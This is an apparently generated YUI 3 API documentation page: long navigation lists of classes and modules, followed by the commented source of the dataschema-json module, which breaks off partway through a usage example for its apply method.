<li><a href="../classes/Renderer.html">Renderer</a></li>
<li><a href="../classes/Resize.html">Resize</a></li>
<li><a href="../classes/RightAxisLayout.html">RightAxisLayout</a></li>
<li><a href="../classes/Router.html">Router</a></li>
<li><a href="../classes/ScrollView.html">ScrollView</a></li>
<li><a href="../classes/Selector.html">Selector</a></li>
<li><a href="../classes/Shape.html">Shape</a></li>
<li><a href="../classes/ShapeGroup.html">ShapeGroup</a></li>
<li><a href="../classes/Slider.html">Slider</a></li>
<li><a href="../classes/SliderBase.html">SliderBase</a></li>
<li><a href="../classes/SliderValueRange.html">SliderValueRange</a></li>
<li><a href="../classes/Sortable.html">Sortable</a></li>
<li><a href="../classes/SplineSeries.html">SplineSeries</a></li>
<li><a href="../classes/StackedAreaSeries.html">StackedAreaSeries</a></li>
<li><a href="../classes/StackedAreaSplineSeries.html">StackedAreaSplineSeries</a></li>
<li><a href="../classes/StackedAxis.html">StackedAxis</a></li>
<li><a href="../classes/StackedBarSeries.html">StackedBarSeries</a></li>
<li><a href="../classes/StackedColumnSeries.html">StackedColumnSeries</a></li>
<li><a href="../classes/StackedComboSeries.html">StackedComboSeries</a></li>
<li><a href="../classes/StackedComboSplineSeries.html">StackedComboSplineSeries</a></li>
<li><a href="../classes/StackedLineSeries.html">StackedLineSeries</a></li>
<li><a href="../classes/StackedMarkerSeries.html">StackedMarkerSeries</a></li>
<li><a href="../classes/StackedSplineSeries.html">StackedSplineSeries</a></li>
<li><a href="../classes/StackingUtil.html">StackingUtil</a></li>
<li><a href="../classes/State.html">State</a></li>
<li><a href="../classes/StyleSheet.html">StyleSheet</a></li>
<li><a href="../classes/Subscriber.html">Subscriber</a></li>
<li><a href="../classes/SVGCircle.html">SVGCircle</a></li>
<li><a href="../classes/SVGDrawing.html">SVGDrawing</a></li>
<li><a href="../classes/SVGEllipse.html">SVGEllipse</a></li>
<li><a href="../classes/SVGGraphic.html">SVGGraphic</a></li>
<li><a href="../classes/SVGPath.html">SVGPath</a></li>
<li><a href="../classes/SVGPieSlice.html">SVGPieSlice</a></li>
<li><a href="../classes/SVGRect.html">SVGRect</a></li>
<li><a href="../classes/SVGShape.html">SVGShape</a></li>
<li><a href="../classes/SWF.html">SWF</a></li>
<li><a href="../classes/SWFDetect.html">SWFDetect</a></li>
<li><a href="../classes/SyntheticEvent.html">SyntheticEvent</a></li>
<li><a href="../classes/SyntheticEvent.Notifier.html">SyntheticEvent.Notifier</a></li>
<li><a href="../classes/SynthRegistry.html">SynthRegistry</a></li>
<li><a href="../classes/Tab.html">Tab</a></li>
<li><a href="../classes/TabView.html">TabView</a></li>
<li><a href="../classes/Test.ArrayAssert.html">Test.ArrayAssert</a></li>
<li><a href="../classes/Test.Assert.html">Test.Assert</a></li>
<li><a href="../classes/Test.AssertionError.html">Test.AssertionError</a></li>
<li><a href="../classes/Test.ComparisonFailure.html">Test.ComparisonFailure</a></li>
<li><a href="../classes/Test.Console.html">Test.Console</a></li>
<li><a href="../classes/Test.CoverageFormat.html">Test.CoverageFormat</a></li>
<li><a href="../classes/Test.DateAssert.html">Test.DateAssert</a></li>
<li><a href="../classes/Test.EventTarget.html">Test.EventTarget</a></li>
<li><a href="../classes/Test.Mock.html">Test.Mock</a></li>
<li><a href="../classes/Test.Mock.Value.html">Test.Mock.Value</a></li>
<li><a href="../classes/Test.ObjectAssert.html">Test.ObjectAssert</a></li>
<li><a href="../classes/Test.Reporter.html">Test.Reporter</a></li>
<li><a href="../classes/Test.Results.html">Test.Results</a></li>
<li><a href="../classes/Test.Runner.html">Test.Runner</a></li>
<li><a href="../classes/Test.ShouldError.html">Test.ShouldError</a></li>
<li><a href="../classes/Test.ShouldFail.html">Test.ShouldFail</a></li>
<li><a href="../classes/Test.TestCase.html">Test.TestCase</a></li>
<li><a href="../classes/Test.TestFormat.html">Test.TestFormat</a></li>
<li><a href="../classes/Test.TestNode.html">Test.TestNode</a></li>
<li><a href="../classes/Test.TestRunner.html">Test.TestRunner</a></li>
<li><a href="../classes/Test.TestSuite.html">Test.TestSuite</a></li>
<li><a href="../classes/Test.UnexpectedError.html">Test.UnexpectedError</a></li>
<li><a href="../classes/Test.UnexpectedValue.html">Test.UnexpectedValue</a></li>
<li><a href="../classes/Test.Wait.html">Test.Wait</a></li>
<li><a href="../classes/Text.AccentFold.html">Text.AccentFold</a></li>
<li><a href="../classes/Text.WordBreak.html">Text.WordBreak</a></li>
<li><a href="../classes/TimeAxis.html">TimeAxis</a></li>
<li><a href="../classes/ToggleButton.html">ToggleButton</a></li>
<li><a href="../classes/TopAxisLayout.html">TopAxisLayout</a></li>
<li><a href="../classes/Transition.html">Transition</a></li>
<li><a href="../classes/UA.html">UA</a></li>
<li><a href="../classes/Uploader.html">Uploader</a></li>
<li><a href="../classes/Uploader.Queue.html">Uploader.Queue</a></li>
<li><a href="../classes/UploaderFlash.html">UploaderFlash</a></li>
<li><a href="../classes/UploaderHTML5.html">UploaderHTML5</a></li>
<li><a href="../classes/ValueChange.html">ValueChange</a></li>
<li><a href="../classes/VerticalLegendLayout.html">VerticalLegendLayout</a></li>
<li><a href="../classes/View.html">View</a></li>
<li><a href="../classes/View.NodeMap.html">View.NodeMap</a></li>
<li><a href="../classes/VMLCircle.html">VMLCircle</a></li>
<li><a href="../classes/VMLDrawing.html">VMLDrawing</a></li>
<li><a href="../classes/VMLEllipse.html">VMLEllipse</a></li>
<li><a href="../classes/VMLGraphic.html">VMLGraphic</a></li>
<li><a href="../classes/VMLPath.html">VMLPath</a></li>
<li><a href="../classes/VMLPieSlice.html">VMLPieSlice</a></li>
<li><a href="../classes/VMLRect.html">VMLRect</a></li>
<li><a href="../classes/VMLShape.html">VMLShape</a></li>
<li><a href="../classes/Widget.html">Widget</a></li>
<li><a href="../classes/WidgetAutohide.html">WidgetAutohide</a></li>
<li><a href="../classes/WidgetButtons.html">WidgetButtons</a></li>
<li><a href="../classes/WidgetChild.html">WidgetChild</a></li>
<li><a href="../classes/WidgetModality.html">WidgetModality</a></li>
<li><a href="../classes/WidgetParent.html">WidgetParent</a></li>
<li><a href="../classes/WidgetPosition.html">WidgetPosition</a></li>
<li><a href="../classes/WidgetPositionAlign.html">WidgetPositionAlign</a></li>
<li><a href="../classes/WidgetPositionConstrain.html">WidgetPositionConstrain</a></li>
<li><a href="../classes/WidgetStack.html">WidgetStack</a></li>
<li><a href="../classes/WidgetStdMod.html">WidgetStdMod</a></li>
<li><a href="../classes/XML.html">XML</a></li>
<li><a href="../classes/YQL.html">YQL</a></li>
<li><a href="../classes/YQLRequest.html">YQLRequest</a></li>
<li><a href="../classes/YUI.html">YUI</a></li>
<li><a href="../classes/YUI~substitute.html">YUI~substitute</a></li>
</ul>
<ul id="api-modules" class="apis modules">
<li><a href="../modules/align-plugin.html">align-plugin</a></li>
<li><a href="../modules/anim.html">anim</a></li>
<li><a href="../modules/anim-base.html">anim-base</a></li>
<li><a href="../modules/anim-color.html">anim-color</a></li>
<li><a href="../modules/anim-curve.html">anim-curve</a></li>
<li><a href="../modules/anim-easing.html">anim-easing</a></li>
<li><a href="../modules/anim-node-plugin.html">anim-node-plugin</a></li>
<li><a href="../modules/anim-scroll.html">anim-scroll</a></li>
<li><a href="../modules/anim-shape.html">anim-shape</a></li>
<li><a href="../modules/anim-shape-transform.html">anim-shape-transform</a></li>
<li><a href="../modules/anim-xy.html">anim-xy</a></li>
<li><a href="../modules/app.html">app</a></li>
<li><a href="../modules/app-base.html">app-base</a></li>
<li><a href="../modules/app-content.html">app-content</a></li>
<li><a href="../modules/app-transitions.html">app-transitions</a></li>
<li><a href="../modules/app-transitions-native.html">app-transitions-native</a></li>
<li><a href="../modules/array-extras.html">array-extras</a></li>
<li><a href="../modules/array-invoke.html">array-invoke</a></li>
<li><a href="../modules/arraylist.html">arraylist</a></li>
<li><a href="../modules/arraylist-add.html">arraylist-add</a></li>
<li><a href="../modules/arraylist-filter.html">arraylist-filter</a></li>
<li><a href="../modules/arraysort.html">arraysort</a></li>
<li><a href="../modules/async-queue.html">async-queue</a></li>
<li><a href="../modules/attribute.html">attribute</a></li>
<li><a href="../modules/attribute-base.html">attribute-base</a></li>
<li><a href="../modules/attribute-complex.html">attribute-complex</a></li>
<li><a href="../modules/attribute-core.html">attribute-core</a></li>
<li><a href="../modules/attribute-events.html">attribute-events</a></li>
<li><a href="../modules/attribute-extras.html">attribute-extras</a></li>
<li><a href="../modules/autocomplete.html">autocomplete</a></li>
<li><a href="../modules/autocomplete-base.html">autocomplete-base</a></li>
<li><a href="../modules/autocomplete-filters.html">autocomplete-filters</a></li>
<li><a href="../modules/autocomplete-filters-accentfold.html">autocomplete-filters-accentfold</a></li>
<li><a href="../modules/autocomplete-highlighters.html">autocomplete-highlighters</a></li>
<li><a href="../modules/autocomplete-highlighters-accentfold.html">autocomplete-highlighters-accentfold</a></li>
<li><a href="../modules/autocomplete-list.html">autocomplete-list</a></li>
<li><a href="../modules/autocomplete-list-keys.html">autocomplete-list-keys</a></li>
<li><a href="../modules/autocomplete-plugin.html">autocomplete-plugin</a></li>
<li><a href="../modules/autocomplete-sources.html">autocomplete-sources</a></li>
<li><a href="../modules/base.html">base</a></li>
<li><a href="../modules/base-base.html">base-base</a></li>
<li><a href="../modules/base-build.html">base-build</a></li>
<li><a href="../modules/base-core.html">base-core</a></li>
<li><a href="../modules/base-pluginhost.html">base-pluginhost</a></li>
<li><a href="../modules/button.html">button</a></li>
<li><a href="../modules/button-core.html">button-core</a></li>
<li><a href="../modules/button-group.html">button-group</a></li>
<li><a href="../modules/button-plugin.html">button-plugin</a></li>
<li><a href="../modules/cache.html">cache</a></li>
<li><a href="../modules/cache-base.html">cache-base</a></li>
<li><a href="../modules/cache-offline.html">cache-offline</a></li>
<li><a href="../modules/cache-plugin.html">cache-plugin</a></li>
<li><a href="../modules/calendar.html">calendar</a></li>
<li><a href="../modules/calendar-base.html">calendar-base</a></li>
<li><a href="../modules/calendarnavigator.html">calendarnavigator</a></li>
<li><a href="../modules/charts.html">charts</a></li>
<li><a href="../modules/charts-base.html">charts-base</a></li>
<li><a href="../modules/charts-legend.html">charts-legend</a></li>
<li><a href="../modules/classnamemanager.html">classnamemanager</a></li>
<li><a href="../modules/clickable-rail.html">clickable-rail</a></li>
<li><a href="../modules/collection.html">collection</a></li>
<li><a href="../modules/console.html">console</a></li>
<li><a href="../modules/console-filters.html">console-filters</a></li>
<li><a href="../modules/cookie.html">cookie</a></li>
<li><a href="../modules/createlink-base.html">createlink-base</a></li>
<li><a href="../modules/dataschema.html">dataschema</a></li>
<li><a href="../modules/dataschema-array.html">dataschema-array</a></li>
<li><a href="../modules/dataschema-base.html">dataschema-base</a></li>
<li><a href="../modules/dataschema-json.html">dataschema-json</a></li>
<li><a href="../modules/dataschema-text.html">dataschema-text</a></li>
<li><a href="../modules/dataschema-xml.html">dataschema-xml</a></li>
<li><a href="../modules/datasource.html">datasource</a></li>
<li><a href="../modules/datasource-arrayschema.html">datasource-arrayschema</a></li>
<li><a href="../modules/datasource-cache.html">datasource-cache</a></li>
<li><a href="../modules/datasource-function.html">datasource-function</a></li>
<li><a href="../modules/datasource-get.html">datasource-get</a></li>
<li><a href="../modules/datasource-io.html">datasource-io</a></li>
<li><a href="../modules/datasource-jsonschema.html">datasource-jsonschema</a></li>
<li><a href="../modules/datasource-local.html">datasource-local</a></li>
<li><a href="../modules/datasource-polling.html">datasource-polling</a></li>
<li><a href="../modules/datasource-textschema.html">datasource-textschema</a></li>
<li><a href="../modules/datasource-xmlschema.html">datasource-xmlschema</a></li>
<li><a href="../modules/datatable.html">datatable</a></li>
<li><a href="../modules/datatable-base.html">datatable-base</a></li>
<li><a href="../modules/datatable-base-deprecated.html">datatable-base-deprecated</a></li>
<li><a href="../modules/datatable-body.html">datatable-body</a></li>
<li><a href="../modules/datatable-column-widths.html">datatable-column-widths</a></li>
<li><a href="../modules/datatable-core.html">datatable-core</a></li>
<li><a href="../modules/datatable-datasource.html">datatable-datasource</a></li>
<li><a href="../modules/datatable-datasource-deprecated.html">datatable-datasource-deprecated</a></li>
<li><a href="../modules/datatable-deprecated.html">datatable-deprecated</a></li>
<li><a href="../modules/datatable-head.html">datatable-head</a></li>
<li><a href="../modules/datatable-message.html">datatable-message</a></li>
<li><a href="../modules/datatable-mutable.html">datatable-mutable</a></li>
<li><a href="../modules/datatable-scroll.html">datatable-scroll</a></li>
<li><a href="../modules/datatable-scroll-deprecated.html">datatable-scroll-deprecated</a></li>
<li><a href="../modules/datatable-sort.html">datatable-sort</a></li>
<li><a href="../modules/datatable-sort-deprecated.html">datatable-sort-deprecated</a></li>
<li><a href="../modules/datatable-table.html">datatable-table</a></li>
<li><a href="../modules/datatype.html">datatype</a></li>
<li><a href="../modules/datatype-date.html">datatype-date</a></li>
<li><a href="../modules/datatype-date-format.html">datatype-date-format</a></li>
<li><a href="../modules/datatype-date-math.html">datatype-date-math</a></li>
<li><a href="../modules/datatype-date-parse.html">datatype-date-parse</a></li>
<li><a href="../modules/datatype-number.html">datatype-number</a></li>
<li><a href="../modules/datatype-number-format.html">datatype-number-format</a></li>
<li><a href="../modules/datatype-number-parse.html">datatype-number-parse</a></li>
<li><a href="../modules/datatype-xml.html">datatype-xml</a></li>
<li><a href="../modules/datatype-xml-format.html">datatype-xml-format</a></li>
<li><a href="../modules/datatype-xml-parse.html">datatype-xml-parse</a></li>
<li><a href="../modules/dd.html">dd</a></li>
<li><a href="../modules/dd-constrain.html">dd-constrain</a></li>
<li><a href="../modules/dd-ddm.html">dd-ddm</a></li>
<li><a href="../modules/dd-ddm-base.html">dd-ddm-base</a></li>
<li><a href="../modules/dd-ddm-drop.html">dd-ddm-drop</a></li>
<li><a href="../modules/dd-delegate.html">dd-delegate</a></li>
<li><a href="../modules/dd-drag.html">dd-drag</a></li>
<li><a href="../modules/dd-drop.html">dd-drop</a></li>
<li><a href="../modules/dd-drop-plugin.html">dd-drop-plugin</a></li>
<li><a href="../modules/dd-gestures.html">dd-gestures</a></li>
<li><a href="../modules/dd-plugin.html">dd-plugin</a></li>
<li><a href="../modules/dd-proxy.html">dd-proxy</a></li>
<li><a href="../modules/dd-scroll.html">dd-scroll</a></li>
<li><a href="../modules/dial.html">dial</a></li>
<li><a href="../modules/dom.html">dom</a></li>
<li><a href="../modules/dom-base.html">dom-base</a></li>
<li><a href="../modules/dom-screen.html">dom-screen</a></li>
<li><a href="../modules/dom-style.html">dom-style</a></li>
<li><a href="../modules/dump.html">dump</a></li>
<li><a href="../modules/editor.html">editor</a></li>
<li><a href="../modules/editor-base.html">editor-base</a></li>
<li><a href="../modules/editor-bidi.html">editor-bidi</a></li>
<li><a href="../modules/editor-br.html">editor-br</a></li>
<li><a href="../modules/editor-lists.html">editor-lists</a></li>
<li><a href="../modules/editor-para.html">editor-para</a></li>
<li><a href="../modules/editor-para-base.html">editor-para-base</a></li>
<li><a href="../modules/editor-para-ie.html">editor-para-ie</a></li>
<li><a href="../modules/editor-tab.html">editor-tab</a></li>
<li><a href="../modules/escape.html">escape</a></li>
<li><a href="../modules/event.html">event</a></li>
<li><a href="../modules/event-base.html">event-base</a></li>
<li><a href="../modules/event-contextmenu.html">event-contextmenu</a></li>
<li><a href="../modules/event-custom.html">event-custom</a></li>
<li><a href="../modules/event-custom-base.html">event-custom-base</a></li>
<li><a href="../modules/event-custom-complex.html">event-custom-complex</a></li>
<li><a href="../modules/event-delegate.html">event-delegate</a></li>
<li><a href="../modules/event-flick.html">event-flick</a></li>
<li><a href="../modules/event-focus.html">event-focus</a></li>
<li><a href="../modules/event-gestures.html">event-gestures</a></li>
<li><a href="../modules/event-hover.html">event-hover</a></li>
<li><a href="../modules/event-key.html">event-key</a></li>
<li><a href="../modules/event-mouseenter.html">event-mouseenter</a></li>
<li><a href="../modules/event-mousewheel.html">event-mousewheel</a></li>
<li><a href="../modules/event-move.html">event-move</a></li>
<li><a href="../modules/event-outside.html">event-outside</a></li>
<li><a href="../modules/event-resize.html">event-resize</a></li>
<li><a href="../modules/event-simulate.html">event-simulate</a></li>
<li><a href="../modules/event-synthetic.html">event-synthetic</a></li>
<li><a href="../modules/event-tap.html">event-tap</a></li>
<li><a href="../modules/event-touch.html">event-touch</a></li>
<li><a href="../modules/event-valuechange.html">event-valuechange</a></li>
<li><a href="../modules/exec-command.html">exec-command</a></li>
<li><a href="../modules/features.html">features</a></li>
<li><a href="../modules/file.html">file</a></li>
<li><a href="../modules/file-flash.html">file-flash</a></li>
<li><a href="../modules/file-html5.html">file-html5</a></li>
<li><a href="../modules/frame.html">frame</a></li>
<li><a href="../modules/gesture-simulate.html">gesture-simulate</a></li>
<li><a href="../modules/get.html">get</a></li>
<li><a href="../modules/get-nodejs.html">get-nodejs</a></li>
<li><a href="../modules/graphics.html">graphics</a></li>
<li><a href="../modules/handlebars.html">handlebars</a></li>
<li><a href="../modules/handlebars-base.html">handlebars-base</a></li>
<li><a href="../modules/handlebars-compiler.html">handlebars-compiler</a></li>
<li><a href="../modules/highlight.html">highlight</a></li>
<li><a href="../modules/highlight-accentfold.html">highlight-accentfold</a></li>
<li><a href="../modules/highlight-base.html">highlight-base</a></li>
<li><a href="../modules/history.html">history</a></li>
<li><a href="../modules/history-base.html">history-base</a></li>
<li><a href="../modules/history-hash.html">history-hash</a></li>
<li><a href="../modules/history-hash-ie.html">history-hash-ie</a></li>
<li><a href="../modules/history-html5.html">history-html5</a></li>
<li><a href="../modules/imageloader.html">imageloader</a></li>
<li><a href="../modules/intl.html">intl</a></li>
<li><a href="../modules/io.html">io</a></li>
<li><a href="../modules/io-base.html">io-base</a></li>
<li><a href="../modules/io-form.html">io-form</a></li>
<li><a href="../modules/io-nodejs.html">io-nodejs</a></li>
<li><a href="../modules/io-queue.html">io-queue</a></li>
<li><a href="../modules/io-upload-iframe.html">io-upload-iframe</a></li>
<li><a href="../modules/io-xdr.html">io-xdr</a></li>
<li><a href="../modules/json.html">json</a></li>
<li><a href="../modules/json-parse.html">json-parse</a></li>
<li><a href="../modules/json-stringify.html">json-stringify</a></li>
<li><a href="../modules/jsonp.html">jsonp</a></li>
<li><a href="../modules/jsonp-url.html">jsonp-url</a></li>
<li><a href="../modules/lazy-model-list.html">lazy-model-list</a></li>
<li><a href="../modules/loader.html">loader</a></li>
<li><a href="../modules/loader-base.html">loader-base</a></li>
<li><a href="../modules/matrix.html">matrix</a></li>
<li><a href="../modules/model.html">model</a></li>
<li><a href="../modules/model-list.html">model-list</a></li>
<li><a href="../modules/model-sync-rest.html">model-sync-rest</a></li>
<li><a href="../modules/node.html">node</a></li>
<li><a href="../modules/node-base.html">node-base</a></li>
<li><a href="../modules/node-core.html">node-core</a></li>
<li><a href="../modules/node-data.html">node-data</a></li>
<li><a href="../modules/node-deprecated.html">node-deprecated</a></li>
<li><a href="../modules/node-event-delegate.html">node-event-delegate</a></li>
<li><a href="../modules/node-event-html5.html">node-event-html5</a></li>
<li><a href="../modules/node-event-simulate.html">node-event-simulate</a></li>
<li><a href="../modules/node-flick.html">node-flick</a></li>
<li><a href="../modules/node-focusmanager.html">node-focusmanager</a></li>
<li><a href="../modules/node-load.html">node-load</a></li>
<li><a href="../modules/node-menunav.html">node-menunav</a></li>
<li><a href="../modules/node-pluginhost.html">node-pluginhost</a></li>
<li><a href="../modules/node-screen.html">node-screen</a></li>
<li><a href="../modules/node-scroll-info.html">node-scroll-info</a></li>
<li><a href="../modules/node-style.html">node-style</a></li>
<li><a href="../modules/oop.html">oop</a></li>
<li><a href="../modules/overlay.html">overlay</a></li>
<li><a href="../modules/panel.html">panel</a></li>
<li><a href="../modules/parallel.html">parallel</a></li>
<li><a href="../modules/pjax.html">pjax</a></li>
<li><a href="../modules/pjax-base.html">pjax-base</a></li>
<li><a href="../modules/pjax-content.html">pjax-content</a></li>
<li><a href="../modules/pjax-plugin.html">pjax-plugin</a></li>
<li><a href="../modules/plugin.html">plugin</a></li>
<li><a href="../modules/pluginhost.html">pluginhost</a></li>
<li><a href="../modules/pluginhost-base.html">pluginhost-base</a></li>
<li><a href="../modules/pluginhost-config.html">pluginhost-config</a></li>
<li><a href="../modules/profiler.html">profiler</a></li>
<li><a href="../modules/querystring.html">querystring</a></li>
<li><a href="../modules/querystring-parse.html">querystring-parse</a></li>
<li><a href="../modules/querystring-parse-simple.html">querystring-parse-simple</a></li>
<li><a href="../modules/querystring-stringify.html">querystring-stringify</a></li>
<li><a href="../modules/querystring-stringify-simple.html">querystring-stringify-simple</a></li>
<li><a href="../modules/queue-promote.html">queue-promote</a></li>
<li><a href="../modules/range-slider.html">range-slider</a></li>
<li><a href="../modules/recordset.html">recordset</a></li>
<li><a href="../modules/recordset-base.html">recordset-base</a></li>
<li><a href="../modules/recordset-filter.html">recordset-filter</a></li>
<li><a href="../modules/recordset-indexer.html">recordset-indexer</a></li>
<li><a href="../modules/recordset-sort.html">recordset-sort</a></li>
<li><a href="../modules/resize.html">resize</a></li>
<li><a href="../modules/resize-contrain.html">resize-contrain</a></li>
<li><a href="../modules/resize-plugin.html">resize-plugin</a></li>
<li><a href="../modules/resize-proxy.html">resize-proxy</a></li>
<li><a href="../modules/rollup.html">rollup</a></li>
<li><a href="../modules/router.html">router</a></li>
<li><a href="../modules/scrollview.html">scrollview</a></li>
<li><a href="../modules/scrollview-base.html">scrollview-base</a></li>
<li><a href="../modules/scrollview-base-ie.html">scrollview-base-ie</a></li>
<li><a href="../modules/scrollview-list.html">scrollview-list</a></li>
<li><a href="../modules/scrollview-paginator.html">scrollview-paginator</a></li>
<li><a href="../modules/scrollview-scrollbars.html">scrollview-scrollbars</a></li>
<li><a href="../modules/selection.html">selection</a></li>
<li><a href="../modules/selector-css2.html">selector-css2</a></li>
<li><a href="../modules/selector-css3.html">selector-css3</a></li>
<li><a href="../modules/selector-native.html">selector-native</a></li>
<li><a href="../modules/shim-plugin.html">shim-plugin</a></li>
<li><a href="../modules/slider.html">slider</a></li>
<li><a href="../modules/slider-base.html">slider-base</a></li>
<li><a href="../modules/slider-value-range.html">slider-value-range</a></li>
<li><a href="../modules/sortable.html">sortable</a></li>
<li><a href="../modules/sortable-scroll.html">sortable-scroll</a></li>
<li><a href="../modules/stylesheet.html">stylesheet</a></li>
<li><a href="../modules/substitute.html">substitute</a></li>
<li><a href="../modules/swf.html">swf</a></li>
<li><a href="../modules/swfdetect.html">swfdetect</a></li>
<li><a href="../modules/tabview.html">tabview</a></li>
<li><a href="../modules/test.html">test</a></li>
<li><a href="../modules/test-console.html">test-console</a></li>
<li><a href="../modules/text.html">text</a></li>
<li><a href="../modules/text-accentfold.html">text-accentfold</a></li>
<li><a href="../modules/text-wordbreak.html">text-wordbreak</a></li>
<li><a href="../modules/transition.html">transition</a></li>
<li><a href="../modules/transition-timer.html">transition-timer</a></li>
<li><a href="../modules/uploader.html">uploader</a></li>
<li><a href="../modules/uploader-deprecated.html">uploader-deprecated</a></li>
<li><a href="../modules/uploader-flash.html">uploader-flash</a></li>
<li><a href="../modules/uploader-html5.html">uploader-html5</a></li>
<li><a href="../modules/uploader-queue.html">uploader-queue</a></li>
<li><a href="../modules/view.html">view</a></li>
<li><a href="../modules/view-node-map.html">view-node-map</a></li>
<li><a href="../modules/widget.html">widget</a></li>
<li><a href="../modules/widget-anim.html">widget-anim</a></li>
<li><a href="../modules/widget-autohide.html">widget-autohide</a></li>
<li><a href="../modules/widget-base.html">widget-base</a></li>
<li><a href="../modules/widget-base-ie.html">widget-base-ie</a></li>
<li><a href="../modules/widget-buttons.html">widget-buttons</a></li>
<li><a href="../modules/widget-child.html">widget-child</a></li>
<li><a href="../modules/widget-htmlparser.html">widget-htmlparser</a></li>
<li><a href="../modules/widget-locale.html">widget-locale</a></li>
<li><a href="../modules/widget-modality.html">widget-modality</a></li>
<li><a href="../modules/widget-parent.html">widget-parent</a></li>
<li><a href="../modules/widget-position.html">widget-position</a></li>
<li><a href="../modules/widget-position-align.html">widget-position-align</a></li>
<li><a href="../modules/widget-position-constrain.html">widget-position-constrain</a></li>
<li><a href="../modules/widget-skin.html">widget-skin</a></li>
<li><a href="../modules/widget-stack.html">widget-stack</a></li>
<li><a href="../modules/widget-stdmod.html">widget-stdmod</a></li>
<li><a href="../modules/widget-uievents.html">widget-uievents</a></li>
<li><a href="../modules/yql.html">yql</a></li>
<li><a href="../modules/yql-nodejs.html">yql-nodejs</a></li>
<li><a href="../modules/yql-winjs.html">yql-winjs</a></li>
<li><a href="../modules/yui.html">yui</a></li>
<li><a href="../modules/yui-base.html">yui-base</a></li>
<li><a href="../modules/yui-later.html">yui-later</a></li>
<li><a href="../modules/yui-log.html">yui-log</a></li>
<li><a href="../modules/yui-throttle.html">yui-throttle</a></li>
<li><a href="../modules/yui3.html">yui3</a></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="yui3-u-3-4">
<div id="api-options">
Show:
<label for="api-show-inherited">
<input type="checkbox" id="api-show-inherited" checked>
Inherited
</label>
<label for="api-show-protected">
<input type="checkbox" id="api-show-protected">
Protected
</label>
<label for="api-show-private">
<input type="checkbox" id="api-show-private">
Private
</label>
<label for="api-show-deprecated">
<input type="checkbox" id="api-show-deprecated">
Deprecated
</label>
</div>
<div class="apidocs">
<div id="docs-main">
<div class="content">
<h1 class="file-heading">File: dataschema/js/dataschema-json.js</h1>
<div class="file">
<pre class="code prettyprint linenums">
/**
Provides a DataSchema implementation which can be used to work with JSON data.
@module dataschema
@submodule dataschema-json
**/
/**
Provides a DataSchema implementation which can be used to work with JSON data.
See the `apply` method for usage.
@class DataSchema.JSON
@extends DataSchema.Base
@static
**/
var LANG = Y.Lang,
isFunction = LANG.isFunction,
isObject = LANG.isObject,
isArray = LANG.isArray,
// TODO: I don't think the calls to Base.* need to be done via Base since
// Base is mixed into SchemaJSON. Investigate for later.
Base = Y.DataSchema.Base,
SchemaJSON;
SchemaJSON = {
/////////////////////////////////////////////////////////////////////////////
//
// DataSchema.JSON static methods
//
/////////////////////////////////////////////////////////////////////////////
/**
* Utility function converts JSON locator strings into walkable paths
*
* @method getPath
* @param locator {String} JSON value locator.
* @return {String[]} Walkable path to data value.
* @static
*/
getPath: function(locator) {
var path = null,
keys = [],
i = 0;
if (locator) {
// Strip the ["string keys"] and [1] array indexes
// TODO: the first two steps can probably be reduced to one with
// /\[\s*(['"])?(.*?)\1\s*\]/g, but the array indices would be
// stored as strings. This is not likely an issue.
locator = locator.
replace(/\[\s*(['"])(.*?)\1\s*\]/g,
function (x,$1,$2) {keys[i]=$2;return '.@'+(i++);}).
replace(/\[(\d+)\]/g,
function (x,$1) {keys[i]=parseInt($1,10)|0;return '.@'+(i++);}).
replace(/^\./,''); // remove leading dot
// Validate against problematic characters.
// commented out because the path isn't sent to eval, so it
// should be safe. I'm not sure what makes a locator invalid.
//if (!/[^\w\.\$@]/.test(locator)) {
path = locator.split('.');
for (i=path.length-1; i >= 0; --i) {
if (path[i].charAt(0) === '@') {
path[i] = keys[parseInt(path[i].substr(1),10)];
}
}
/*}
else {
Y.log("Invalid locator: " + locator, "error", "dataschema-json");
}
*/
}
return path;
},
/**
* Utility function to walk a path and return the value located there.
*
* @method getLocationValue
* @param path {String[]} Locator path.
* @param data {String} Data to traverse.
* @return {Object} Data value at location.
* @static
*/
getLocationValue: function (path, data) {
var i = 0,
len = path.length;
for (;i<len;i++) {
if (isObject(data) && (path[i] in data)) {
data = data[path[i]];
} else {
data = undefined;
break;
}
}
return data;
},
/**
Applies a schema to an array of data located in a JSON structure, returning
a normalized object with results in the `results` property. Additional
information can be parsed out of the JSON for inclusion in the `meta`
property of the response object. If an error is encountered during
processing, an `error` property will be added.
The input _data_ is expected to be an object or array. If it is a string,
it will be passed through `Y.JSON.parse()`.
If _data_ contains an array of data records to normalize, specify the
_schema.resultListLocator_ as a dot separated path string just as you would
reference it in JavaScript. So if your _data_ object has a record array at
_data.response.results_, use _schema.resultListLocator_ =
"response.results". Bracket notation can also be used for array indices or
object properties (e.g. "response['results']"); This is called a "path
locator"
Field data in the result list is extracted with field identifiers in
_schema.resultFields_. Field identifiers are objects with the following
properties:
* `key` : <strong>(required)</strong> The path locator (String)
* `parser`: A function or the name of a function on `Y.Parsers` used
to convert the input value into a normalized type. Parser
functions are passed the value as input and are expected to
return a value.
If no value parsing is needed, you can use path locators (strings)
instead of field identifiers (objects) -- see example below.
If no processing of the result list array is needed, _schema.resultFields_
can be omitted; the `response.results` will point directly to the array.
If the result list contains arrays, `response.results` will contain an
array of objects with key:value pairs assuming the fields in
_schema.resultFields_ are ordered in accordance with the data array
values.
If the result list contains objects, the identified _schema.resultFields_
will be used to extract a value from those objects for the output result.
To extract additional information from the JSON, include an array of
path locators in _schema.metaFields_. The collected values will be
stored in `response.meta`.
@example
// Process array of arrays
var schema = {
resultListLocator: 'produce.fruit',
resultFields: [ 'name', 'color' ]
},
data = {
produce: {
fruit: [
[ 'Banana', 'yellow' ],
[ 'Orange', 'orange' ],
[ 'Eggplant', 'purple' ]
]
}
};
var response = Y.DataSchema.JSON.apply(schema, data);
// response.results[0] is { name: "Banana", color: "yellow" }
// Process array of objects + some metadata
schema.metaFields = [ 'lastInventory' ];
data = {
produce: {
fruit: [
{ name: 'Banana', color: 'yellow', price: '1.96' },
{ name: 'Orange', color: 'orange', price: '2.04' },
{ name: 'Eggplant', color: 'purple', price: '4.31' }
]
},
lastInventory: '2011-07-19'
};
response = Y.DataSchema.JSON.apply(schema, data);
// response.results[0] is { name: "Banana", color: "yellow" }
// response.meta.lastInventory is '2001-07-19'
// Use parsers
schema.resultFields = [
{
key: 'name',
parser: function (val) { return val.toUpperCase(); }
},
{
key: 'price',
parser: 'number' // Uses Y.Parsers.number
}
];
response = Y.DataSchema.JSON.apply(schema, data);
